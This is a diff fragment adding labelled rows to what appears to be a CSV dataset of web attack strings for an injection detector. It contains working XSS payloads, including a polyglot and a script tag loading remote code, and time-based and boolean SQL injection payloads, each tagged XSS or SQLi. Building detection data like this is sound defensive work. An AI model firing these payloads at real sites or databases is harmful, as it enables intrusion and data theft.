+ "<div draggable=""true"" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small>",1,XSS,984
986
+ "<bdo onkeypress=""alert(1)"" contenteditable>test</bdo>",1,XSS,985
987
+ 1 and 9122 = 4153# nxcv,2,SQLi,986
988
+ "<style>@keyframes slidein {}</style><center style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></center>",1,XSS,987
989
+ "<IMG SRC=x onsubmit=""alert(String.fromCharCode(88,83,83))"">",1,XSS,988
990
+ "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( 'cgou' like 'cgou",2,SQLi,989
991
+ 1'+ ( select 'hjku' where 1954 = 1954 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) ) +',2,SQLi,990
992
+ "1 ) ) as fwru where 5262 = 5262 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,991
993
+ <summary onpointerover=alert(1)>XSS</summary>,1,XSS,992
994
+ "<menu oncut=""alert(1)"" contenteditable>test</menu>",1,XSS,993
995
+ "<article onbeforecut=""alert(1)"" contenteditable>test</article>",1,XSS,994
996
+ "<script a="">'>"" SRC=""http://www.securitycompass.com/xss.js""></script>",1,XSS,995
997
+ "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tbody id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></tbody>",1,XSS,996
998
+ "javascript:alert()//*/alert()/*'-/""/-eval(`(alert())`)//\""-alert()//--></title></style></noscript></textarea></template></noembed><script>alert()</script><frameset onload=alert()><svg/onload=alert(1)> alert()//",1,XSS,997
999
+ select case when 2930 = 7964 then 1 else null end--,2,SQLi,998
1000
+ 1' where 2547 = 2547 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,999